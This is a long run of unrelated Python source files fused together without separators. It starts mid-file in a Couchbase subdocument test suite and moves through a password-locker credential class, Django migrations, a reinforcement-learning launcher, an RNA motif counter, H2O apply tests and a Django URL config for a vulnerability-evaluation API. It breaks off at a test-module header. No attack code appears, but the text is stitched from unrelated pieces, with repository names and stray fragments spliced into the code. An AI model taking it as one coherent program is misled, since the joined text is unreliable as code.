{0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. 
#data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.array_push_last(inserted_keys, replace_string, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.array_push_last(inserted_keys, "999", path='height') data_set.array_push_last(inserted_keys, replace_string, path='array') def test_simple_dataset_array_push_first(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple array_push_first sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.array_push_first(inserted_keys, replace_string, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.array_push_last(inserted_keys, "999", path='height') data_set.array_push_first(inserted_keys, replace_string, path='array') def test_simple_dataset_counter(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple counter sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.counter_all_paths(inserted_keys, path='geometry.coordinates[0]') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') data_set.counter_all_paths(inserted_keys, path='height') #data_set.counter_all_paths(inserted_keys, path='array') def test_simple_dataset_array_add_unique(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple add array unique sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.array_add_unique(inserted_keys, replace_string, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.counter_all_paths(inserted_keys, 1, path='height') #data_set.counter_all_paths(inserted_keys, replace_string, path='array') def test_simple_dataset_multi_lookup(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple multi lookup sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. 
#data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.multi_lookup_all_paths(inserted_keys, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.counter_all_paths(inserted_keys, 1, path='height') #data_set.counter_all_paths(inserted_keys, replace_string, path='array') def test_simple_dataset_multi_lookup2(self): pass def generate_string(self, range_val=100): long_string = ''.join(chr(97 + randint(0, 25)) for i in range(range_val)) return '"' + long_string + '"' def _get_path(self, subdoc_elt=None, levels=None): subdoc_path = subdoc_elt for i in range(levels-1): subdoc_path +='.'+subdoc_elt return subdoc_path class SimpleDataSet(SubdocSanityTests): def __init__(self, helper, num_docs): self.helper = helper self.num_docs = num_docs self.name = "simple_dataset" self.log = logger.Logger.get_logger() def load(self): inserted_keys = self.helper.insert_docs(self.num_docs, self.name) return inserted_keys def get_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.get_sd(in_key, path) except Exception as e: self.helper.testcase.fail( "Unable to get key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def upsert_all_docs(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.dict_upsert_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to upsert key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def add_all_docs(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.dict_add_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to add key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def remove_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.delete_sd(in_key, path) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to remove value for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def exists_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.exists_sd(in_key, path) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to validate value for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def replace_all_docs(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.replace_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to replace for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def array_push_last(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.array_push_last_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to array push last for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def array_push_first(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = 
self.helper.client.array_push_first_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to array push first for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def counter_all_paths(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.counter_sd(in_key, path, 10000) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to counter incr/decr for key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def array_add_unique(self, inserted_keys, long_string, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.array_add_unique_sd(in_key, path, long_string) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to add array_unique key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def multi_lookup_all_paths(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.multi_lookup_sd(in_key, path) print(data) except Exception as e: print('[ERROR] {}'.format(e)) self.helper.testcase.fail( "Unable to add array_unique key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) class DeeplyNestedDataSet(SubdocSanityTests): def __init__(self, helper, num_docs): self.helper = helper self.num_docs = num_docs self.name = "deeplynested_dataset" self.levels = 30 self.log = logger.Logger.get_logger() def load(self, long_path=False): inserted_keys = self.helper.insert_nested_docs(self.num_docs, self.name, self.levels, long_path) return inserted_keys, self.levels def get_all_docs(self, inserted_keys, path): for in_key in inserted_keys: num_tries = 1 try: opaque, cas, data = self.helper.client.get_sd(in_key, path) #self.log.info(data) #assert data == check_data except Exception as e: self.log.info(e) self.helper.testcase.fail( "Unable to get key {0} for path {1} after {2} tries" .format(in_key, path, num_tries)) def upsert_all_docs(self): pass import string import pyperclip from random import choice class User: """ Class that generates new instances of users. """ user_list = [] #Empty user list def __init__(self,username,password): """ __init__ method that defines properties for our objects Args: username: New user username. password: . """ self.username = username self.password = password def save_user(self): """ save_user method saves objects into list """ User.user_list.append(self) @classmethod def find_by_username(cls,username): ''' Method that takes in a username and returns a user that matched that username. Args: username: username to search for Returns: user that matched the username. ''' for user in cls.user_list: if user.username == username: return user @classmethod def user_exist(cls,username): ''' Method that checks if a user exists from the user list. Args: username: Username to search if it exists Returns : Boolean: True or false depending if the user exists ''' for user in cls.user_list: if user.username == username: return True return False class Credential: """ Class that generates new instances of credential """ credential_list = [] #Empty credential def __init__(self,acc_name,login_name,password): """ __init__ method that defines properties for our objects Args: acc_name: New credential acc_name. login_name: New credential login_name. password: . 
""" self.acc_name = acc_name self.login_name = login_name self.password = password def save_credential(self): """ save_credential method saves objects into list """ Credential.credential_list.append(self) def del_credential(self): ''' delete_credential method deletes a saved credential from the credential_list ''' Credential.credential_list.remove(self) @classmethod def find_by_acc_name(cls,acc_name): ''' Method that takes in a number and returns a credential that matches that account name. Args: acc_name: Account name to search for Returns : Credential of account that matches the account name and details. ''' for credential in cls.credential_list: if credential.acc_name == acc_name: return credential @classmethod def credential_exist(cls,acc_name): ''' Method that checks if a credential exists from the credential list. Args: acc_name: Account name to search if it exists Returns : Boolean: True or false depending if the credential exists ''' for credential in cls.credential_list: if credential.acc_name == acc_name: return True return False @classmethod def display_credentials(cls): ''' method that returns the credential list ''' return cls.credential_list health/migrations/0018_billing_record_medical_record_prescription.py # Generated by Django 3.1.4 on 2021-01-13 09:46 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('health', '0017_auto_20210111_0928'), ] operations = [ migrations.CreateModel( name='Prescription', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(blank=True, max_length=100, null=True)), ('quantity', models.CharField(blank=True, max_length=100, null=True)), ('days', models.CharField(blank=True, max_length=100, null=True)), ('time', models.CharField(blank=True, max_length=100, null=True)), ('appoint', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='health.appointment')), ], ), migrations.CreateModel( name='Medical_Record', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', models.DateField(blank=True, null=True)), ('disc', models.CharField(blank=True, max_length=100, null=True)), ('file', models.FileField(blank=True, null=True, upload_to='')), ('appoint', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='health.appointment')), ], ), migrations.CreateModel( name='Billing_Record', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(blank=True, max_length=100, null=True)), ('amount', models.IntegerField(blank=True, null=True)), ('appoint', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='health.appointment')), ], ), ] tuvapp/tuvappcom1-10 # coding=utf-8 from functools import wraps from faker.utils import text def slugify(fn): @wraps(fn) def wrapper(*args, **kwargs): return text.slugify(fn(*args, **kwargs)) return wrapper def slugify_domain(fn): @wraps(fn) def wrapper(*args, **kwargs): return text.slugify(fn(*args, **kwargs), allow_dots=True) return wrapper def slugify_unicode(fn): @wraps(fn) def wrapper(*args, **kwargs): return text.slugify(fn(*args, **kwargs), allow_unicode=True) return wrapper import argparse import torch import numpy as np import buffers import drl import envs def get_args(): """Basic configuration 
--------------------------------------------------------------------------- exp_name | the name of the experiment; the result will be saved at results/exp_name by default seed | random seed of the whole experiment under which the result should be the same scenario | the type/background of the environment env | environment to interact with, here we give some typical example control: CartPole-v1, Acrobot-v0, MountainCarContinuous-v0 atari: pong, qbert, freeway mujuco: HalfCheetah, Ant, Humanoid num_env | number of parallel environments algo | deep learning algorithm to choose disable_cuda | cpu training even when gpus are available """ parser = argparse.ArgumentParser(description="base configuration parser") parser.add_argument("--exp_name", default="unnamed", type=str, \ help="the name of the experiment; the result will be saved at results/exp_name by default") parser.add_argument("--seed", default=0, type=int, \ help="random seed of the whole experiment under which the result should be the same") parser.add_argument("--scenario", default="control", choices=["control", "atari", "mujoco"], \ help="the type/background of the environment") parser.add_argument("--env", default="CartPole-v1", type=str, \ help="environment to interact with") parser.add_argument("--num_env", default=1, type=int, \ help="number of parallel environments") parser.add_argument("--algo", default="dqn", \ choices=["dqn", "a2c", "ddpg", "rainbow", "ppo", "td3", "sac"], \ help="deep learning algorithm to choose") parser.add_argument("--disable_cuda", default=False, action="store_true", \ help="cpu training even when gpus are available") return parser.parse_known_args()[0] args = get_args() print("\n------ basic experimental configuration ------") for key, val in vars(args).items(): print("{:>20} | {}".format(key, val)) print("----------------------------------------------\n") np.random.seed(args.seed) torch.manual_seed(np.random.randint(1e9)) torch.backends.cudnn.benchmark = False torch.backends.cudnn.deterministic = True # See https://pytorch.org/docs/stable/notes/randomness.html if torch.cuda.is_available() and not args.disable_cuda: device = torch.device("cuda") torch.cuda.manual_seed(np.random.randint(1e9)) else: device = torch.device("cpu") torch.set_num_threads(4) env, test_env = envs.make_env(args) test_env.eval() buffer = buffers.make_buffer(args, env) if args.algo == "dqn": drl.DQN(env, test_env, device, buffer) elif args.algo == "a2c": drl.A2C(env, test_env, device, buffer) elif args.algo == "ddpg": drl.DDPG(env, test_env, device, buffer) elif args.algo == "rainbow": drl.Rainbow(env, test_env, device, buffer) elif args.algo == "ppo": drl.PPO(env, test_env, device, buffer) elif args.algo == "td3": drl.TD3(env, test_env, device, buffer) elif args.algo == "sac": drl.SAC(env, test_env, device, buffer) else: raise ValueError("algorithm not defined")SED/plot_SEDs.py #!/usr/bin/env python from __future__ import division from past.utils import old_div import os, sys import tableio import pylab seds = sys.argv[1:] pylab.figure(1) fmax = 0.0 for sed in seds: (w, f) = tableio.get_data(sed, cols=(0, 1)) #fmax = max(f.max(),fmax) f = old_div(f, f.max()) #print fmax pylab.semilogx(w, f, label=sed) pylab.xlim(1000, 5e4) pylab.legend() pylab.show() pylab.close() import re from Bio import SeqIO import os import argparse def getmatchpositions(regexp, seq): matches = [(m.start(0)) for m in re.finditer(regexp, seq)] return matches def regexpmeta(fasta, bins): motif = r'(?=([AU]GG(.{0,7})[AU]GG(.{0,7})[AU]GG(.{0,7})[AU]GG))' bins = 
float(bins) motiffrac = {} #{binnumber : [number of times you find motif in this bin, number of times you looked]} for i in range(int(bins)): motiffrac[i + 1] = [0, 0] for record in SeqIO.parse(fasta, 'fasta'): seq = str(record.seq.transcribe()) for i in range(len(seq)): pos = i + 1 posbin = int(round((pos / float(len(seq))) * bins)) if posbin == 0: posbin = 1 motiffrac[posbin][1] +=1 matches = getmatchpositions(motif, seq) for match in matches: pos = match + 1 posbin = int(round((pos / float(len(seq))) * bins)) if posbin == 0: posbin = 1 motiffrac[posbin][0] +=1 return motiffrac def writebins(motiffrac, region, seqclass, outfile): if not os.path.isfile(outfile): with open(outfile, 'w') as f: f.write(('\t').join(['Bin', 'frac', 'region', 'class']) + '\n') with open(outfile, 'a') as f: for posbin in motiffrac: frac = motiffrac[posbin][0] / float(motiffrac[posbin][1]) f.write(('\t').join([str(posbin), str(frac), region, seqclass]) + '\n') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--fasta', type = str, help = 'Fasta file of sequences to look through.') parser.add_argument('--bins', type = str, help = 'Number of bins for metagene.') parser.add_argument('--region', type = str, help = 'Transcript region of fasta.') parser.add_argument('--seqclass', type = str, help = 'Delta LR class of fasta.') parser.add_argument('--outfile', type = str, help = 'Output file.') args = parser.parse_args() motiffrac = regexpmeta(args.fasta, args.bins) writebins(motiffrac, args.region, args.seqclass, args.outfile) pywikc/constraint.py class ConstraintTerm: """ A single term in a linear constraint equation. """ def __init__(self, node, dof, coef, name=''): """ Constructor. :param int node: Tag of the node. :param int dof: Degree of freedom at the node. :param float coef: Coefficient in the constraint. :param str name: Identifier for the term. """ self.node = node self.dof = dof self.coef = coef self.name = name return class Constraint: """ Defines a linear constraint equation in standard form. Standard form is: \\sum_i \\sum_j c^j_i u^j_i = 0, where i is the node ID, j indicates the DOF, c^j_i is the coefficient, and u^j_i is the DOF specified by i and j. The user needs to specify the node, DOF, and coefficient for all the terms in the equation. """ def __init__(self, constr_name=''): """ Constructor. :param str constr_name: Identifier for the constraint equation. """ self.constr_name = constr_name self.terms = [] return def add_term(self, node, dof, coef, name=''): self.terms.append(ConstraintTerm(node, dof, coef, name)) return class DashboardException(Exception): pass class NotionClientException(Exception): """For SDK external exceptions.""" pass from eve import Eve from eve_swagger import swagger app = Eve() app.register_blueprint(swagger) # required. See http://swagger.io/specification/#infoObject for details. 
app.config['SWAGGER_INFO'] = { 'title': 'Recipe API', 'version': '1.0', 'description': 'an API description', 'termsOfService': 'my terms of service', 'contact': { 'name': 'nicola', 'url': 'http://nicolaiarocci.com' }, 'license': { 'name': 'BSD', 'url': 'https://github.com/pyeve/eve-swagger/blob/master/LICENSE', }, 'schemes': ['http', 'https'], } if __name__ == '__main__': app.run() module/globals/get_variable.py #!/usr/bin/env python3 from config_element.yaml_manager import ConfYaml from base.logger import logged, LOGGER @logged def get_var(key, value=None): if key == 'phone': if value: return ConfYaml('user.yaml').read()[value] for phone in ConfYaml('user.yaml').read(): yield phone if key == 'user_id' or key == 'token' or key == 'order_id' or key == 'pay_password': if value: return ConfYaml('user.yaml').read()[value][key] else: raise ValueError("取 {} 必须传手机号!".format(key)) globals_var = ConfYaml('global_variable.yaml').read() if globals_var: if key in globals_var: return globals_var[key] else: return LOGGER.info('key :{}, value: {}'.format(key, value)) raise KeyError("没找到变量!") @logged def push_var(var, phone, value=None) -> bool: if var == 'phone': return ConfYaml('user.yaml').update({phone: None}) if var == 'user_id' or var == 'token' or var == 'order_id' or var == 'pay_password': if value: return ConfYaml('user.yaml').update({phone: {var: value}}) else: raise ValueError("取 {} 必须传手机号!".format(var)) return ConfYaml('global_variable.yaml').update({var: phone}) # -*- coding: utf-8 -*- """Tests for `{{ cookiecutter.project_slug }}` package.""" {% if cookiecutter.use_pytest == 'y' -%} import pytest {% else %} import unittest {%- endif %} {%- if cookiecutter.command_line_interface|lower == 'click' %} from click.testing import CliRunner {%- endif %} from {{ cookiecutter.project_slug }} import {{ cookiecutter.project_slug }} {%- if cookiecutter.command_line_interface|lower == 'click' %} from {{ cookiecutter.project_slug }} import cli {%- endif %} {%- if cookiecutter.use_pytest == 'y' %} def test_command_line_interface(): """Test the CLI.""" runner = CliRunner() result = runner.invoke(cli.main) assert result.exit_code == 0 assert '{{ cookiecutter.project_slug }}.cli.main' in result.output help_result = runner.invoke(cli.main, ['--help']) assert help_result.exit_code == 0 assert '--help Show this message and exit.' 
in help_result.output {%- endif %} Yessense/script-extractdatasets/race/look_on_race.py import hashlib import os import pickle from src.script_extraction.sign.extract_script import create_signs from src.script_extraction.visualization.show_script import show_script saved_files_dir = '/texts/saved/' saved_files = [os.path.basename(f) for f in os.listdir(saved_files_dir)] TEXT_FOLDER = "/home/yessense/PycharmProjects/ScriptExtractionForVQA/texts/Race/" nice_texts = ['80.txt', '59.txt', '43.txt', '84.txt', '24.txt'] files = [os.path.join(TEXT_FOLDER, f) for f in os.listdir(TEXT_FOLDER) if os.path.isfile(os.path.join(TEXT_FOLDER, f))] for filepath in files: h = hashlib.sha1(filepath.encode()).hexdigest() if h in saved_files: with open(os.path.join(saved_files_dir, h), 'rb') as f: info = pickle.load(f) script = create_signs(info) show_script(script, group_roles=True) print(f'{filepath} processed') import deuce def DeuceContextHook(req, resp, params): """ Deuce Context Hook """ from threading import local as local_factory deuce.context = local_factory() deuce.context.datacenter = deuce.conf.api_configuration.datacenter.lower() PythonDataIntegrator/pythondataintegratorsrc/api/infrastructure/api/decorators/Endpoint.py10-100 import json from functools import wraps from infrastructure.api.EndpointWrapper import EndpointWrapper from infrastructure.utils.TypeChecker import TypeChecker class _Endpoint: def __init__(self, function, namespace=None): self.namespace = namespace self.function = function self.endpoint_wrapper = EndpointWrapper() def __call__(self, *args, **kwargs): input_type, input_name = self.find_input_type() req = None if input_type is not None and input_name is not None: if TypeChecker().is_class(input_type): if self.function.__name__ == 'get': req = self.endpoint_wrapper.get_request_from_parser(input_type) else: req = self.endpoint_wrapper.get_request_from_body(input_type) else: req = self.endpoint_wrapper.get_request_from_parser_for_primitive(input_name, input_type) if req is not None: res = self.function(args[0], req, **kwargs) else: res = self.function(args[0], **kwargs) if self.return_type() is not None: result = json.loads(json.dumps(res.to_dict(), default=self.endpoint_wrapper.date_converter)) endpoint_response = self.endpoint_wrapper.get_response(result=result) return endpoint_response else: endpoint_response = self.endpoint_wrapper.get_response(result=res) return endpoint_response def input_type_names(self): self.function.__annotations__.keys() return self.function.__annotations__.keys().remove("return") def input_types(self): input_annotations = self.function.__annotations__ input_argument_types = [] input_argument_names = [] for annotation_key in input_annotations.keys(): if annotation_key != "return": argument_type = input_annotations[annotation_key] input_argument_types.append(argument_type) input_argument_names.append(annotation_key) return input_argument_types, input_argument_names def return_type(self): if "return" in self.function.__annotations__: return self.function.__annotations__["return"] else: return None def find_input_type(self): input_types, input_names = self.input_types() if input_types == None or len(input_types) == 0: return None, None elif len(input_types) == 1: return input_types[0], input_names[0] else: return None, None def expect_inputs(self): input_type, input_name = self.find_input_type() expect_model = None if input_type is not None and input_name is not None: if TypeChecker().is_class(input_type): if self.function.__name__ == 'get': expect_model = 
self.endpoint_wrapper.request_parser(input_type) else: expect_model = self.endpoint_wrapper.request_model(input_type) else: expect_model = self.endpoint_wrapper.create_parser(input_name, input_type) return expect_model def marshal_with_fields(self): if self.return_type() is None: fields = self.endpoint_wrapper.BaseModel else: fields = self.endpoint_wrapper.response_model(self.return_type()) return fields def endpoint(namespace): def decorator(function): def instance() -> _Endpoint: _instance = _Endpoint(function, namespace) return _instance @wraps(function) @namespace.expect(instance().expect_inputs(), validate=True) @namespace.marshal_with(instance().marshal_with_fields()) def wrapper(*args, **kwargs): return instance().__call__(*args, **kwargs) return wrapper return decorator # Generated by Django 2.0.5 on 2018-05-16 08:51 from django.db import migrations, models DIST_PYTHON3 = { '3.4': ['14.04', 'dubnium', 'jessie'], '3.5': ['16.04'], '3.6': ['17.10', '18.04'], } def add_python3(apps, schema_editor): Target = apps.get_model('rainboard', 'Target') for python3, names in DIST_PYTHON3.items(): Target.objects.filter(name__in=names).update(python3=python3) class Migration(migrations.Migration): dependencies = [ ('rainboard', '0012_target'), ] operations = [ migrations.AddField( model_name='target', name='python3', field=models.CharField(blank=True, max_length=3, null=True), ), migrations.RunPython(add_python3), ] #!/usr/bin/env python # -*- encoding: utf-8 -*- from __future__ import division, print_function from future.utils import PY2 import sys sys.path.insert(1, "../../") import h2o from tests import pyunit_utils import pandas as pd from pandas.util.testing import assert_frame_equal import numpy as np from functools import partial def h2o_to_float(h2o, pd): """ The method transform h2o result into a frame of floats. It is used as assert helper to compare with Pandas results. :return: """ return (h2o.astype(float), pd) def pd_to_int(h2o, pd): return (h2o, pd.apply(lambda x: 1 if x else 0)) # # List of operators which are usable in lambda expression # as parameter of `apply` function. # # Structure: ' : [h2o expression, # supported axis, # corresponding pandas expression or None if it is same as h2o expression, # assert transformer or None to use default # ] # # Note (1): not all operators support all directions. # # Note (2): some of operators produces differently typed results than Pandas which is used for results # validation. Hence, each record can specify transformation before assert is invoked. 
# # Operators N:1 - transform a vector to a number # OPS_VEC_TO_SCALAR = { "mean": [lambda x: x.mean(), [0,1], None, None], "median": [lambda x: x.median(), [0], None, h2o_to_float], "max": [lambda x: x.max(), [0,1], None, h2o_to_float], "min": [lambda x: x.min(), [0,1], None, h2o_to_float], "sd": [lambda x: x.sd(), [0], lambda x: x.std(), None], "nacnt": [lambda x: x.nacnt(), [0], lambda x: sum(x.isnull()), None], } # Operators N:N - are applied on each element in vector OPS_VEC_TO_VEC = { "adhoc-fce" : [lambda col: (col * col - col * 5 * col).abs() - 3.14, [0], None, None], "abs" : [lambda col: col.abs(), [0], None, None], "cos" : [lambda col: col.cos(), [0], lambda col: np.cos(col), None], "sin" : [lambda col: col.sin(), [0], lambda col: np.sin(col), None], "cosh" : [lambda col: col.cosh(), [0], lambda col: np.cosh(col), None], "exp" : [lambda col: col.exp(), [0], lambda col: np.exp(col), None], "sqrt" : [lambda col: col.sqrt(), [0], lambda col: np.sqrt(col), h2o_to_float], "tan" : [lambda col: col.tan(), [0], lambda col: np.tan(col), None], "tanh" : [lambda col: col.tanh(), [0], lambda col: np.tanh(col), h2o_to_float], "ceil" : [lambda col: col.ceil(), [0], lambda col: np.ceil(col), h2o_to_float], "floor" : [lambda col: col.floor(), [0], lambda col: np.floor(col), h2o_to_float], "log" : [lambda col: col.log(), [], lambda col: np.log(col), None], "select" : [lambda x: x["PSA"], [1], None, None], "select2": [lambda x: x['PSA'] > x['VOL'], [1], None, pd_to_int], "select3": [lambda x: 1 if x['PSA'] > x['VOL'] else 0, [], None, None] } def datafile(): return pyunit_utils.locate("smalldata/logreg/prostate.csv") def h2o_frame_fixture(): return h2o.import_file(datafile()) def pandas_frame_fixture(): return pd.read_csv(datafile()) def test_ops(fr, pf, ops_map): for axis in range(0,2): tester = partial(test_lambda, fr, pf, axis=axis) for name, op in ops_map.items(): fce, supported_axes, pandas_fce, assert_transf = op assert_fce = get_assert_fce_for_axis(axis, assert_transf) op_desc = "Op '{}' (axis={}) ".format(name, axis) print(op_desc, end='') if axis not in supported_axes: print("UNSUPPORTED") else: tester(fce=fce, pandas_fce=pandas_fce, assert_fce=assert_fce) print("OK") def pyunit_apply_n_to_1_ops(): # H2O Frame fr = h2o_frame_fixture() # And Pandas DataFrame pf = pandas_frame_fixture() test_ops(fr, pf, OPS_VEC_TO_SCALAR) def pyunit_apply_n_to_n_ops(): # H2O Frame fr = h2o_frame_fixture() # And Pandas DataFrame pf = pandas_frame_fixture() test_ops(fr, pf, OPS_VEC_TO_VEC) def pyunit_apply_with_args(): fr = h2o_frame_fixture() ref = fr.scale(center=False, scale=False).as_data_frame() #vars false = False args = (False, False) kwargs = dict(center=False, scale=False) partial_args = (False,) partial_kwargs = dict(scale=False) to_test = dict( scale_with_arg=lambda x: x.scale(False, False), scale_with_kwarg=lambda x: x.scale(center=False, scale=False), scale_with_argkwarg=lambda x: x.scale(False, scale=False), scale_with_global_arg=(lambda x: x.scale(false, scale=false)), scale_with_args=(lambda x: x.scale(*args)), scale_with_kwargs=(lambda x: x.scale(**kwargs)), scale_with_partial_args=(lambda x: x.scale(False, *partial_args)), scale_with_partial_kwargs=(lambda x: x.scale(False, **partial_kwargs)), scale_with_partial_kwargs2=(lambda x: x.scale(center=False, **partial_kwargs)), scale_with_args_and_kwargs=(lambda x: x.scale(*partial_args, **partial_kwargs)), scale_with_all_kind_args=(lambda x: x.scale(False, *partial_args, scale=False, **partial_kwargs)) if not PY2 else None, # surprisingly this 
works because our signature verification is not that strict, but it's fine... at least behaves as expected. ) for test, lbd in to_test.items(): if lbd: print(test) res = fr.apply(lbd) res_df = res.as_data_frame() assert_frame_equal(res_df, ref) h2o.remove(res) def test_lambda(h2o_frame, panda_frame, fce, axis, assert_fce, pandas_fce=None): h2o_result = h2o_frame.apply(fce, axis=axis).as_data_frame() pd_result = panda_frame.apply(pandas_fce if pandas_fce else fce, axis=axis) assert_fce(h2o_result, pd_result) def get_assert_fce_for_axis(axis, assert_transf=None): assert_fce = __AXIS_ASSERTS__[axis] if assert_transf: return lambda h2o,pd: assert_fce(*assert_transf(h2o,pd)) else: return assert_fce def assert_row_equal(h2o_result, pd_result): if type(pd_result) is pd.core.frame.Series: pd_result = pd_result.to_frame(h2o_result.columns[0]) assert_frame_equal(h2o_result, pd_result) def assert_column_equal(h2o_result, pd_result): if type(pd_result) is pd.core.frame.Series: pd_result = pd_result.to_frame().transpose() assert_frame_equal(h2o_result, pd_result) __AXIS_ASSERTS__ = { 0: assert_column_equal, 1: assert_row_equal} __TESTS__ = [pyunit_apply_n_to_n_ops, pyunit_apply_n_to_1_ops, pyunit_apply_with_args] if __name__ == "__main__": for func in __TESTS__: pyunit_utils.standalone_test(func) else: for func in __TESTS__: func() core/urls.py """core URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.conf import settings from django.conf.urls.static import static from django.contrib import admin from django.urls import include, path from drf_yasg import openapi from drf_yasg.views import get_schema_view from rest_framework import permissions from rest_framework.documentation import include_docs_urls API_TITLE = 'Vuln API' API_DESCRIPTION = 'A Web API for evaluating vulnerabilities in a project' schema_view = get_schema_view( openapi.Info( title=API_TITLE, default_version='v1', description=API_DESCRIPTION, terms_of_service='https://www.google.com/policies/terms/', contact=openapi.Contact(email=''), license=openapi.License(name='BSD License'), ), public=True, permission_classes=(permissions.AllowAny,), ) urlpatterns = [ # Django administration path('dj-admin/', admin.site.urls), # Local apps path('', include('datasets.urls')), # Rest API path('api/v1/', include('api.urls')), path('docs/', include_docs_urls(title=API_TITLE, description=API_DESCRIPTION)), path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'), path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) test/cases/for_else.py import end for i in range(3): pass else: if True: pass # end is missing here end 1-10 # -*- coding: utf-8 -*- # Generated by Django 1.11.12 on 2018-04-18 02:26 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('rrs', '0016_rmh_layerbranch_nonnull'), ] operations = [ migrations.AddField( model_name='maintenanceplan', name='maintainer_style', field=models.CharField(choices=[('I', 'Per-recipe - maintainers.inc'), ('L', 'Layer-wide')], default='L', help_text='Maintainer tracking style for the layers within this plan', max_length=1), ), ] krshrimali/ChatBot-IIITNR import os os.system("node bot.js") text = "What is my name?" 0 #!/usr/bin/env python # -*- coding: utf-8 -*- """ human_curl.tests ~~~~~~~~~~~~~~~~ Unittests for 